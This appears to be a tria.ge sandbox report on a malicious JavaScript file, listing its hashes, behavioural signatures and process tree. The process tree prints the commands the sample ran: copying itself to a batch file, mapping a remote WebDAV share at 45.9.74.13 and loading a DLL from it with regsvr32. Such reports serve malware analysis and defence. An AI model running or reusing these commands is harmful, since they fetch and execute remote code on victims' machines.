Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
92s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 16:50
Static task
static1
Behavioral task
behavioral1
Sample
14114325129011740.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
14114325129011740.js
Resource
win10v2004-20240709-en
General
-
Target
14114325129011740.js
-
Size
5KB
-
MD5
06227bd247cc80ac4cc0c1750dbeb67f
-
SHA1
760787f3b7d1132bbea6394be2c9714097e3523d
-
SHA256
4edc1900be3c13d0c21adfb4a5cd5706a1b5e52a6eb09394e51115027586d98d
-
SHA512
510ac8a426ea82ce33b46a74f5125b880b8539d95191f404c702821a8415b2a88282f88c1cfaff39e24823bcc11d8f5ff2fa42e416b739ae602cd27bd87a3bd7
-
SSDEEP
96:+qbxSB84WPjxFPfRQaKe3iYv4sQI96hOhGwW5NJ1720Ja/zcl9DlqF/KPa9X1sML:g0DSIWhdmhBUt7JG05riLkD6vrLjSkjz
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3316 wrote to memory of 4956 3316 wscript.exe 79 PID 3316 wrote to memory of 4956 3316 wscript.exe 79 PID 4956 wrote to memory of 2056 4956 cmd.exe 81 PID 4956 wrote to memory of 2056 4956 cmd.exe 81 PID 4956 wrote to memory of 5116 4956 cmd.exe 82 PID 4956 wrote to memory of 5116 4956 cmd.exe 82
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\14114325129011740.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\14114325129011740.js" "C:\Users\Admin\\uhcjye.bat" && "C:\Users\Admin\\uhcjye.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2056
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\652.dll3⤵PID:5116
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD506227bd247cc80ac4cc0c1750dbeb67f
SHA1760787f3b7d1132bbea6394be2c9714097e3523d
SHA2564edc1900be3c13d0c21adfb4a5cd5706a1b5e52a6eb09394e51115027586d98d
SHA512510ac8a426ea82ce33b46a74f5125b880b8539d95191f404c702821a8415b2a88282f88c1cfaff39e24823bcc11d8f5ff2fa42e416b739ae602cd27bd87a3bd7